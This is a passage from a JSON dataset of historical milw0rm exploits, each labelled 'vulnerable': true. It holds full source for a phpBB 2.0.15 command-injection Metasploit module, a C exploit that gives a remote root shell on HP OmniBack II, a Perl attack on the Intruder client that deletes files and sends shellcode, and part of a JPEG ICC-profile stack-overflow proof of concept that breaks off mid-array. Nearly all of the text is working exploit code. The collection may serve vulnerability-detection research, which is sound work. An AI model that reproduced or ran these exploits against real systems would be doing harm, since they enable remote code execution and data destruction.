619        "content": "##\n\n#        Title: phpBB 2.0.15 arbitrary command execution eXploit\n\n#    Name: php_phpbb2_0_15.pm\n\n# License: Artistic/BSD/GPL\n\n#         Info: Coded because of boredom.\n\n#\n\n#  - This is an exploit module for the Metasploit Framework, please see\n\n#     http://metasploit.com/projects/Framework for more information.\n\n##\n\n\n\npackage Msf::Exploit::php_phpbb2_0_15;\n\nuse base \"Msf::Exploit\";\n\nuse strict;\n\nuse Pex::Text;\n\nuse bytes;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info = {\n\n        'Name'     => 'phpBB 2.0.15 arbitrary command execution eXploit',\n\n        'Version'  => '$Revision: 1.0 $',\n\n        'Authors'  => [ 'str0ke <str0ke [at] milw0rm.com> [Artistic/GPL]' ],\n\n        'Arch'     => [ ],\n\n        'OS'       => [ ],\n\n        'Priv'     => 0,\n\n        'UserOpts' =>\n\n          {\n\n                'RHOST' => [1, 'ADDR', 'The target address'],\n\n                'RPORT' => [1, 'PORT', 'The target port', 80],\n\n                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\n\n                'RPATH' => [1, 'DATA', 'Path to the viewtopic script', '/phpBB2/viewtopic.php'],\n\n                'TOPIC' => [1, 'DATA', 'viewtopic id', '1'],\n\n                'SSL'   => [0, 'BOOL', 'Use SSL'],\n\n          },\n\n\n\n        'Description' => Pex::Text::Freeform(qq{\n\n                This module exploits an arbitrary code execution flaw in phpbb 2.0.15.\n\n}),\n\n\n\n        'Refs' =>\n\n          [\n\n                ['MIL', '1113'],\n\n          ],\n\n\n\n        'Payload' =>\n\n          {\n\n                'Space' => 512,\n\n                'Keys'  => ['cmd', 'cmd_bash'],\n\n          },\n\n\n\n        'Keys' => ['phpbb'],\n\n  };\n\n\n\nsub new {\n\n        my $class = shift;\n\n        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n        return($self);\n\n}\n\n\n\nsub Exploit {\n\n        my $self = shift;\n\n        my $target_host    = $self->GetVar('RHOST');\n\n        my $target_port    = $self->GetVar('RPORT');\n\n        my $vhost          = $self->GetVar('VHOST') || $target_host;\n\n        my $path           = $self->GetVar('RPATH');\n\n        my $topic           = $self->GetVar('TOPIC');\n\n        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;\n\n\n\n        # Encode the command as a set of chr() function calls\n\n        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));\n\n\n\n        # Create the phpBB get request data\n\n        my $data = \"?t=$topic&highlight=%27.\".\n\n                \"passthru($byte)\".\n\n                \".%27\";\n\n\n\n        my $req =\n\n                \"GET $path$data HTTP/1.1\\r\\n\".\n\n                \"Host: $vhost:$target_port\\r\\n\".\n\n                \"Content-Type: application/html\\r\\n\".\n\n                \"Content-Length: \". length($data).\"\\r\\n\".\n\n                \"Connection: Close\\r\\n\".\n\n                \"\\r\\n\";\n\n\n\n        my $s = Msf::Socket::Tcp->new(\n\n                'PeerAddr'  => $target_host,\n\n                'PeerPort'  => $target_port,\n\n                'LocalPort' => $self->GetVar('CPORT'),\n\n                'SSL'       => $self->GetVar('SSL'),\n\n          );\n\n\n\n        if ($s->IsError){\n\n                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n                return;\n\n        }\n\n\n\n        $self->PrintLine(\"[*] Sending the malicious phpBB Get request...\");\n\n\n\n        $s->Send($req);\n\n\n\n        my $results = $s->Recv(-1, 20);\n\n        $s->Close();\n\n\n\n        return;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-07-19]",
620        "vulnerable": true
621    },
622    {
623        "exploit_id": 1114,
624        "content": "/*\n\n * HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is\n\n *\n\n * Omniback is a network backup system by HP, widely used.\n\n * took me some time to figure out how omniback communicated then it was just\n\n * a matter of finding a bug.\n\n *\n\n * This lovely little exploit will give you a remote \"shell\" of sorts, you\n\n * can execute any command on the system.\n\n *\n\n * As far as I can tell this thing is vuln on every Omniback I have seen.\n\n * I've tried HP-UX, Linux so far, with diff versions etc. It needs some change\n\n * to work on windows, but should very extremly easy, be creative.\n\n *\n\n * Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>\n\n *\n\n * - DiGiT [digit@security.is]\n\n *\n\n * I'm releasing this because it leaked and kids got their hands on it ;<\n\n * sorry.\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <sys/time.h>\n\n#include <errno.h>\n\n#include <netdb.h>\n\n#include <unistd.h>\n\n#include <sys/stat.h>\n\n\n\n\n\nint sockfd;\n\nstruct hostent *host;\n\n\n\nusage (char *progname)\n\n  {\n\n\n\n  printf (\"\\nOmniback II *: remote exploit by DiGiT - teddi@linux.is\\n\");\n\n  printf (\"Gives possibility to execute any command on a remote system as root!\\n\\n\");\n\n  printf (\"Usage: %s hostname \\n\\n\", progname);\n\n  exit (1);\n\n\n\n}\n\n\n\nint\n\nshell()\n\n  {\n\n\n\n   fd_set fd_stat;\n\n   char recv[1024];\n\n   int n,i;\n\n   static char testcmd[256] = \"/bin/uname -a ; id ;\\r\\n\";\n\n\n\n        fprintf(stdout, \"We have remote shell&%#$&%!\\n\");\n\n        fprintf(stdout, \"\\nType in any command and it will get executed.\\nHave fun... DiGiT - teddi@linux.is\\n\\n\\n\");\n\n        write(sockfd, testcmd, strlen(testcmd));\n\n     \n\n   while(1)\n\n   {\n\n      FD_ZERO(&fd_stat);\n\n      FD_SET(sockfd, &fd_stat);\n\n      FD_SET(0, &fd_stat);\n\n      select(sockfd+1, &fd_stat, NULL, NULL, NULL);\n\n      if (FD_ISSET(sockfd, &fd_stat))\n\n       {\n\n         if((n=read (sockfd,recv,sizeof(recv))) < 0)\n\n           {\n\n              printf(\"Connection has been closed\\n\");\n\n              exit(0);\n\n           }\n\n           for(i = 0; i < n ; i++) {\n\n         if(recv[i] == '\\000') {\n\n      recv[i] = \"\";\n\n    }\n\n           }\n\n             recv[n] = 0;\n\n       recv[n-1] = '\\n';\n\n             fprintf(stdout, \"%s\\n\", recv);\n\n        }\n\n      if (FD_ISSET(0, &fd_stat))\n\n       {\n\n         if((n=read(0, recv, sizeof(recv)))>0)\n\n           {\n\n            if(write(sockfd, recv,n) == -1)\n\n                {\n\n                 printf(\"Error %$#\\n\");\n\n                 exit(0);\n\n               }\n\n           }\n\n       }\n\n   }\n\n}\n\n\n\n\n\nsend_code ()\n\n  {\n\n\n\n  char path[32];\n\n\n\n /* I dont care I just made test code and it worked, so #$%$# off */\n\n write (sockfd, \"\\000\\000\\000.\", 4);\n\n write(sockfd, \"2\", 1);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" a\", 2);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" 0\", 2);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" 0\", 2);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" 0\", 2);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" A\", 2);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \" 28\", 3);\n\n write(sockfd, \"\\000\", 1);\n\n snprintf(path, sizeof(path), \"/../../../bin/sh\");\n\n write(sockfd, path, strlen(path));\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \"\\000\", 1);\n\n write(sockfd, \"digit \", 6);\n\n write(sockfd, \"AAAA\\n\", 6); // nada..\n\n\n\n shell(); // and the lord said, let there be shell.\n\n exit(0);\n\n \n\n}\n\n\n\ncreate_socket (char *hostname)\n\n  {\n\n\n\n  struct sockaddr_in s;\n\n  int ipaddr;\n\n\n\n  if ((host = gethostbyname (hostname)) == NULL)\n\n  {\n\n    herror (\"gethostbyname\");\n\n    exit (1);\n\n  }\n\n\n\n  memcpy (&ipaddr, host->h_addr, host->h_length);\n\n\n\n  memset (&s, 0, sizeof (struct sockaddr_in));\n\n  s.sin_family = AF_INET;\n\n  s.sin_port = htons (5555);\n\n  s.sin_addr.s_addr = ipaddr;\n\n\n\n  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)\n\n    {\n\n      perror (\"socket\");\n\n      exit (1);\n\n    }\n\n\n\n  if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)\n\n    {\n\n      perror (\"connect\");\n\n      exit (1);\n\n    }\n\n\n\n}\n\n\n\nint\n\nmain (char argc, char *argv[])\n\n {\n\n\n\n  char hostname[256];\n\n\n\n  if (argc < 2)\n\n    {\n\n      usage (argv[0]);\n\n      return 0;\n\n    }\n\n\n\n    strncpy(hostname, argv[1], sizeof(hostname));\n\n    create_socket (hostname);\n\n    send_code();\n\n\n\n return 0;\n\n\n\n} \n\n\n\n// milw0rm.com [2000-12-21]",
625        "vulnerable": true
626    },
627    {
628        "exploit_id": 1115,
629        "content": "#!/usr/bin/perl\n\n#\n\n# Intruder Command Execution DOS Exploit\n\n# --------------------------------------\n\n#   Infam0us Gr0up - Securiti Research\n\n#\n\n#\n\n# [?] Version: libwww-perl-5.76\n\n# [+] Connecting to 127.0.0.1..\n\n# [+] Connected\n\n# [+] Backup for files..[DONE]\n\n# [+] Build malicious pages..[DONE]\n\n# [+] Open CDRom victim..[DONE]\n\n# [+] Delete C:\\WINNT\\regedit.exe..[DONE]\n\n# [+] Now attacking ..[SUCCESS]\n\n# [+] Check if Server D0S'ed!\n\n#\n\n# Tested on Windows2000 SP4(Win NT)\n\n# Info : infamous.2hell.com\n\n#\n\n\n\nuse IO::Socket;\n\nuse LWP;\n\nuse Tk;\n\nuse Win32::File;\n\n\n\n\n\n$subject = \"Intruder Command Execution DOS Exploit\";\n\n$vers = \"Intruder Client 1.00\";\n\n$vendor = \"http://digilander.iol.it/TatankaRock\";\n\n$codz = \"basher13 - basher13(at)linuxmail.org\";\n\n\n\n$ARGC=@ARGV;\n\n\n\nif ($ARGC !=2) {\n\n    print \"\\n\";\n\n    print \"     $subject\\n\";\n\n    print \"-------------------------------------------------\\n\";\n\n    print \"     Infam0us Gr0up - Securiti Research\\n\\n\";\n\n    print \"Usage: $0 [remote IP] [file Path]\\n\";\n\n    print \"Exam: $0 127.0.0.1 C:\\\\WINNT\\\\regedit.exe\\n\";\n\n    print \"- [remote IP] = Target host IP/Hostname\\n\";\n\n    print \"- [file Path] = Path file to delete\\n\";\n\n    exit(1);\n\n}\n\n\n\n$host = $ARGV[0];\n\n$delfile = $ARGV[1];\n\n# Modify to own feed\n\n$text = \"Subject: $subject\n\nVersion: $vers\n\nURL: $vendor\n\nCoders: $codz\";\n\n$box = \"C:\\-[$subject]-.htm\";\n\n\n\n$shellcore = \n\n\"Moving_Dialog,0x13:test:1\".\"\\x68\\x62\\x69\\x1\\x1\\x68\\x72\\x64\\x60\\x73\\x68\\x68\\x21\\x53\".\n\n\"\\x64\\x68\\x74\\x73\\x68\\x75\\x68\\x21\\x52\\x64\\x62\\x68\\x74\\x71\\x21\\x2C\\x68\\x21\\x46\\x73\\x31\".\n\n\"\\x68\\x6C\\x31\\x74\\x72\\x68\\x48\\x6F\\x67\\x60\\x68\\x21\\x43\\x58\\x21\\x68\\x55\\x40\\x42\\x4A\\x68\".\n\n\"\\x46\\x21\\x40\\x55\\x68\\x43\\x44\\x48\\x4F\\x68\\x49\\x40\\x45\\x21\\x68\\x58\\x4E\\x54\\x21\\x68\\x42\".\n\n\"\\x4A\\x20\\x20\\x68\\x40\\x55\\x55\\x40\\x68\\x45\\x4E\\x52\\x21\\x68\\x42\\x4A\\x20\\x20\\x68\\x40\\x55\".\n\n\"\\x55\\x40\\x68\\x45\\x4E\\x52\\x21\\x33\\xC9\\x8B\\xDC\\x80\\x33\\x1\\x43\\x41\\x83\\xF9\\x52\\x75\\xF6\".\n\n\"\\x54\\xC3\";\n\n\n\nprint \"\\n\";\n\nprint \"       $subject\\n\";\n\nprint \"-------------------------------------------------------\\n\";\n\nprint \"[?] Version: libwww-perl-$LWP::VERSION\\n\";\n\nprint \"[+] Connecting to $host..\\n\";\n\nsleep(2);\n\n$socket = new IO::Socket::INET (PeerAddr => \"$host\",\n\n                                PeerPort => 1256,\n\n                                Proto => 'tcp');\n\n                                die unless $socket;\n\nprint \"[+] Connected\\n\";\n\nsleep(2);\n\nprint \"[+] Backup for files..\";\n\n$lama = $delfile;\n\n$baru = \"$delfile.BAK.$$(basher13)\";\n\n\n\n open(OLD, \"< $lama\")         or die \"FAILED to open $lama\\n[-] Reason: Try to another place..\\n\";\n\n open(NEW, \"> $baru\")         or die \"can't open $baru: $!\\n\";\n\n\n\n while () {\n\n        s/\\b(p)earl\\b/${1}erl/i;\n\n        (print NEW $_)       or die \"FAILED to write to $baru\\n[-] Reason: Server has secure permission\\n\";\n\n    }\n\n close(OLD)                  or die \"FAILED to close $lama\\n\";\n\n close(NEW)                  or die \"can't close $baru\\n\";\n\nprint \"[DONE]\\n\";     \n\nprint \"[+] Build malicious pages..\";\n\n\n\nopen(OUT, \">$box\") or die(\"unable to open $box: $!\");\n\nopen FH, \">$box\";\n\nprint FH \"$text\";\n\nprint \"[DONE]\\n\";\n\nclose FH;\n\n\n\nprint \"[+] Open CDRom victim..\";\n\nprint $socket \"OpenCDROM,\";\n\nsleep(1);\n\nprint \"[DONE]\\n\";\n\nprint \"[+] Delete $delfile..\";\n\nprint $socket \"Move,$delfile|$box\";\n\nsleep(2);\n\nprint \"[DONE]\\n\";\n\nprint \"[+] Now attacking ..\";\n\nsleep(1);\n\nprint $socket \"$shellcore\";\n\nsleep(3);\n\nprint \"[SUCCESS]\\n\";\n\nclose $socket;\n\nprint \"[+] Server D0S'ed!\\n\";\n\nprint \"-------------------------------------------------------\\n\";\n\nmy $mw = MainWindow->new(-title => 'INFO',);\n\n    my $var;\n\n\n\n    my $opt = $mw->Optionmenu(\n\n                \n\n                -options => [qw()],\n\n                -command => sub { print \"[>] \", shift, \"\\n\" },\n\n                -variable => \\$var,\n\n                )->pack;\n\n    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   \n\n    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;\n\n    MainLoop;\n\n\n\n# milw0rm.com [2005-07-21]",
630        "vulnerable": true
631    },
632    {
633        "exploit_id": 1116,
634        "content": "/*\n\n* Author: snooq [http://www.redpuffer.net/snooq/web/] \n\n* Date: 21 July 2005\n\n*\n\n* When I looked at the PoC posted on bugtraq.... \n\n* I was basically quite disappointed. The 'PoC' fixed\n\n* 'tag count' to a large number.. but this code path\n\n* does not seem to be exploitable... GetColorProfileElement\n\n* crashes becoz it hits the page boundary while enumerating \n\n* the tags...this simply triggers 'Access Violation' before\n\n* we even overwrite anything in the memory...\n\n*\n\n* well.. at least that is what I see in SoftICE... tell me if \n\n* it's wrong...\n\n*\n\n* anyway.. I decided to dig deeper...and I was lucky enuff \n\n* to uncover a more promising path... \n\n*\n\n* by controlling the size field of 'redMatrixColumnTag'...\n\n* we are able to trick 'GetColorProfileElement' to overwrite\n\n* the stack content...\n\n*\n\n* the offending code looks like this:\n\n* \n\n* .text:73B32144 mov esi, eax\n\n* .text:73B32146 mov eax, ecx\n\n* .text:73B32148 shr ecx, 2\n\n* .text:73B3214B rep movsd \n\n* .text:73B3214D mov ecx, eax\n\n* .text:73B3214F and ecx, 3\n\n* .text:73B32152 rep movsb\n\n* .text:73B32154 mov ecx, [ebp+lp]\n\n* .text:73B32157 mov [ecx], eax\n\n*\n\n* ESI points to 'redMatrixColumnTag' data\n\n* EDI points to a buffer on the stack\n\n* ECX is what we can control (the size field)\n\n*\n\n* At 73B3214B, it will overflow to the adjacent stack frames\n\n* if ECX is large enuff. As a result, we are able to overwrite\n\n* the saved EIP value of icm32.671123E7...\n\n*\n\n* the onli prob now.. is I hav not found a reliable \n\n* 'jmp' address... or perhaps.. try SEH trick instead?? \n\n*\n\n* please tell me about it if u have a more reliable way of \n\n* exploiting this... while I am heading to my bed now.\n\n* \n\n* nonethelss.. this should be good enuff to reproduce the \n\n* bug.. enjoy!\n\n*\n\n* Greetz:\n\n* =======\n\n* - sk, ck, eugene, nam, jeff, ken, andre, sugi..etc\n\n* - julian and chris from thinkSECURE\n\n*/\n\n\n\n#include <windows.h>\n\n#include <stdlib.h>\n\n#include <stdio.h>\n\n\n\n#define TARGET 1\n\n#define NOP 0x90\n\n#define FNAME \"snooq.jpg\"\n\n#define BSIZE sizeof(buff)-1\n\n#define EIP_OFFSET 0x336\n\n#define SC_OFFSET 0x246\n\n#define NOP_OFFSET 0x218\n\n#define NOP_SIZE 0x112\n\n\n\n/* \n\n* Silly JPEG stuffed with ICC profile.........\n\n*/\n\n\n\nchar buff[]=\"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x00\\x01\\x00\\x60\"\n\n\"\\x00\\x60\\x00\\x00\\xFF\\xE2\\x0C\\x58\\x49\\x43\\x43\\x5F\\x50\\x52\\x4F\\x46\"\n\n\"\\x49\\x4C\\x45\\x00\\x01\\x01\\x00\\x00\\x0C\\x48\\x4C\\x69\\x6E\\x6F\\x02\\x10\"\n\n\"\\x00\\x00\\x6D\\x6E\\x74\\x72\\x52\\x47\\x42\\x20\\x58\\x59\\x5A\\x20\\x07\\xCE\"\n\n\"\\x00\\x02\\x00\\x09\\x00\\x06\\x00\\x31\\x00\\x00\\x61\\x63\\x73\\x70\\x4D\\x53\"\n\n\"\\x46\\x54\\x00\\x00\\x00\\x00\\x49\\x45\\x43\\x20\\x73\\x52\\x47\\x42\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xF6\\xD6\\x00\\x01\"\n\n\"\\x00\\x00\\x00\\x00\\xD3\\x2D\\x48\\x50\\x20\\x20\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x63\\x70\\x72\\x74\\x00\\x00\"\n\n\"\\x01\\x50\\x00\\x00\\x00\\x33\\x64\\x65\\x73\\x63\\x00\\x00\\x01\\x84\\x00\\x00\"\n\n\"\\x00\\x6C\\x77\\x74\\x70\\x74\\x00\\x00\\x01\\xF0\\x00\\x00\\x00\\x14\\x62\\x6B\"\n\n\"\\x70\\x74\\x00\\x00\\x02\\x04\\x00\\x00\\x00\\x14\\x72\\x58\\x59\\x5A\\x00\\x00\"\n\n\"\\x02\\x18\\x00\\x00\\x00\\xFC\\x67\\x58\\x59\\x5A\\x00\\x00\\x02\\x2C\\x00\\x00\"\n\n\"\\x00\\x14\\x62\\x58\\x59\\x5A\\x00\\x00\\x02\\x40\\x00\\x00\\x00\\x14\\x64\\x6D\"\n\n\"\\x6E\\x64\\x00\\x00\\x02\\x54\\x00\\x00\\x00\\x70\\x64\\x6D\\x64\\x64\\x00\\x00\"\n\n\"\\x02\\xC4\\x00\\x00\\x00\\x88\\x76\\x75\\x65\\x64\\x00\\x00\\x03\\x4C\\x00\\x00\"\n\n\"\\x00\\x86\\x76\\x69\\x65\\x77\\x00\\x00\\x03\\xD4\\x00\\x00\\x00\\x24\\x6C\\x75\"\n\n\"\\x6D\\x69\\x00\\x00\\x03\\xF8\\x00\\x00\\x00\\x14\\x6D\\x65\\x61\\x73\\x00\\x00\"\n\n\"\\x04\\x0C\\x00\\x00\\x00\\x24\\x74\\x65\\x63\\x68\\x00\\x00\\x04\\x30\\x00\\x00\"\n\n\"\\x00\\x0C\\x72\\x54\\x52\\x43\\x00\\x00\\x04\\x3C\\x00\\x00\\x08\\x0C\\x67\\x54\"\n\n\"\\x52\\x43\\x00\\x00\\x04\\x3C\\x00\\x00\\x08\\x0C\\x62\\x54\\x52\\x43\\x00\\x00\"\n\n\"\\x04\\x3C\\x00\\x00\\x08\\x0C\\x74\\x65\\x78\\x74\\x00\\x00\\x00\\x00\\x43\\x6F\"\n\n\"\\x70\\x79\\x72\\x69\\x67\\x68\\x74\\x20\\x28\\x63\\x29\\x20\\x31\\x39\\x39\\x38\"\n\n\"\\x20\\x48\\x65\\x77\\x6C\\x65\\x74\\x74\\x2D\\x50\\x61\\x63\\x6B\\x61\\x72\\x64\"\n\n\"\\x20\\x43\\x6F\\x6D\\x70\\x61\\x6E\\x79\\x00\\x00\\x64\\x65\\x73\\x63\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x12\\x73\\x52\\x47\\x42\\x20\\x49\\x45\\x43\\x36\\x31\"\n\n\"\\x39\\x36\\x36\\x2D\\x32\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x12\\x73\\x52\\x47\\x42\\x20\\x49\\x45\\x43\\x36\\x31\\x39\\x36\\x36\"\n\n\"\\x2D\\x32\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x58\\x59\\x5A\\x20\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\xF3\\x51\\x00\\x01\\x00\\x00\\x00\\x01\\x16\\xCC\\x58\\x59\\x5A\\x20\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x58\\x59\"\n\n\"\\x5A\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x6F\\xA2\\x00\\x00\\x38\\xF5\\x00\\x00\"\n\n\"\\x03\\x90\\x58\\x59\\x5A\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x62\\x99\\x00\\x00\"\n\n\"\\xB7\\x85\\x00\\x00\\x18\\xDA\\x58\\x59\\x5A\\x20\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x24\\xA0\\x00\\x00\\x0F\\x84\\x00\\x00\\xB6\\xCF\\x64\\x65\\x73\\x63\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x16\\x49\\x45\\x43\\x20\\x68\\x74\\x74\\x70\\x3A\\x2F\"\n\n\"\\x2F\\x77\\x77\\x77\\x2E\\x69\\x65\\x63\\x2E\\x63\\x68\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x16\\x49\\x45\\x43\\x20\\x68\\x74\\x74\\x70\\x3A\"\n\n\"\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x69\\x65\\x63\\x2E\\x63\\x68\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x65\\x73\\x63\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x2E\\x49\\x45\\x43\\x20\\x36\\x31\\x39\\x36\\x36\\x2D\"\n\n\"\\x32\\x2E\\x31\\x20\\x44\\x65\\x66\\x61\\x75\\x6C\\x74\\x20\\x52\\x47\\x42\\x20\"\n\n\"\\x63\\x6F\\x6C\\x6F\\x75\\x72\\x20\\x73\\x70\\x61\\x63\\x65\\x20\\x2D\\x20\\x73\"\n\n\"\\x52\\x47\\x42\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x04\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x43\\x43\\x43\\x43\\x65\\x66\"\n\n\"\\x61\\x75\\x6C\\x74\\x20\\x52\\x47\\x42\\x20\\x63\\x6F\\x6C\\x6F\\x75\\x72\\x20\"\n\n\"\\x73\\x70\\x61\\x63\\x65\\x20\\x2D\\x20\\x73\\x52\\x47\\x42\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x64\\x65\\x73\\x63\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2C\\x52\\x65\"\n\n\"\\x66\\x65\\x72\\x65\\x6E\\x63\\x65\\x20\\x56\\x69\\x65\\x77\\x69\\x6E\\x67\\x20\"\n\n\"\\x43\\x6F\\x6E\\x64\\x69\\x74\\x69\\x6F\\x6E\\x20\\x69\\x6E\\x20\\x49\\x45\\x43\"\n\n\"\\x36\\x31\\x39\\x36\\x36\\x2D\\x32\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x2C\\x52\\x65\\x66\\x65\\x72\\x65\\x6E\\x63\\x65\\x20\\x56\"\n\n\"\\x69\\x65\\x77\\x69\\x6E\\x67\\x20\\x43\\x6F\\x6E\\x64\\x69\\x74\\x69\\x6F\\x6E\"\n\n\"\\x20\\x69\\x6E\\x20\\x49\\x45\\x43\\x36\\x31\\x39\\x36\\x36\\x2D\\x32\\x2E\\x31\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x76\\x69\\x65\\x77\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x13\\xA4\\xFE\\x00\\x14\\x5F\\x2E\\x00\\x10\\xCF\\x14\\x00\\x03\"\n\n\"\\xED\\xCC\\x00\\x04\\x13\\x0B\\x00\\x03\\x5C\\x9E\\x00\\x00\\x00\\x01\\x58\\x59\"\n\n\"\\x5A\\x20\\x00\\x00\\x00\\x00\\x00\\x4C\\x09\\x56\\x00\\x50\\x00\\x00\\x00\\x57\"\n\n\"\\x1F\\xE7\\x6D\\x65\\x61\\x73\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x02\\x8F\\x00\\x00\\x00\\x02\\x73\\x69\\x67\\x20\\x00\\x00\\x00\\x00\\x43\\x52\"\n\n\"\\x54\\x20\\x63\\x75\\x72\\x76\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\"\n\n\"\\x00\\x05\\x00\\x0A\\x00\\x0F\\x00\\x14\\x00\\x19\\x00\\x1E\\x00\\x23\\x00\\x28\"\n\n\"\\x00\\x2D\\x00\\x32\\x00\\x37\\x00\\x3B\\x00\\x40\\x00\\x45\\x00\\x4A\\x00\\x4F\"\n\n\"\\x00\\x54\\x00\\x59\\x00\\x5E\\x00\\x63\\x00\\x68\\x00\\x6D\\x00\\x72\\x00\\x77\"\n\n\"\\x00\\x7C\\x00\\x81\\x00\\x86\\x00\\x8B\\x00\\x90\\x00\\x95\\x00\\x9A\\x00\\x9F\"\n\n\"\\x00\\xA4\\x00\\xA9\\x00\\xAE\\x00\\xB2\\x00\\xB7\\x00\\xBC\\x00\\xC1\\x00\\xC6\"\n\n\"\\x00\\xCB\\x00\\xD0\\x00\\xD5\\x00\\xDB\\x00\\xE0\\x00\\xE5\\x00\\xEB\\x00\\xF0\"\n\n\"\\x00\\xF6\\x00\\xFB\\x01\\x01\\x01\\x07\\x01\\x0D\\x01\\x13\\x01\\x19\\x01\\x1F\"\n\n\"\\x01\\x25\\x01\\x2B\\x01\\x32\\x01\\x38\\x01\\x3E\\x01\\x45\\x01\\x4C\\x01\\x52\"\n\n\"\\x01\\x59\\x01\\x60\\x01\\x67\\x01\\x6E\\x01\\x75\\x01\\x7C\\x01\\x83\\x01\\x8B\"\n\n\"\\x01\\x92\\x01\\x9A\\x01\\xA1\\x01\\xA9\\x01\\xB1\\x01\\xB9\\x01\\xC1\\x01\\xC9\"\n\n\"\\x01\\xD1\\x01\\xD9\\x01\\xE1\\x01\\xE9\\x01\\xF2\\x01\\xFA\\x02\\x03\\x02\\x0C\"\n\n\"\\x02\\x14\\x02\\x1D\\x02\\x26\\x02\\x2F\\x02\\x38\\x02\\x41\\x02\\x4B\\x02\\x54\"\n\n\"\\x02\\x5D\\x02\\x67\\x02\\x71\\x02\\x7A\\x02\\x84\\x02\\x8E\\x02\\x98\\x02\\xA2\"\n\n\"\\x02\\xAC\\x02\\xB6\\x02\\xC1\\x02\\xCB\\x02\\xD5\\x02\\xE0\\x02\\xEB\\x02\\xF5\"\n\n\"\\x03\\x00\\x03\\x0B\\x03\\x16\\x03\\x21\\x03\\x2D\\x03\\x38\\x03\\x43\\x03\\x4F\"\n\n\"\\x03\\x5A\\x03\\x66\\x03\\x72\\x03\\x7E\\x03\\x8A\\x03\\x96\\x03\\xA2\\x03\\xAE\"\n\n\"\\x03\\xBA\\x03\\xC7\\x03\\xD3\\x03\\xE0\\x03\\xEC\\x03\\xF9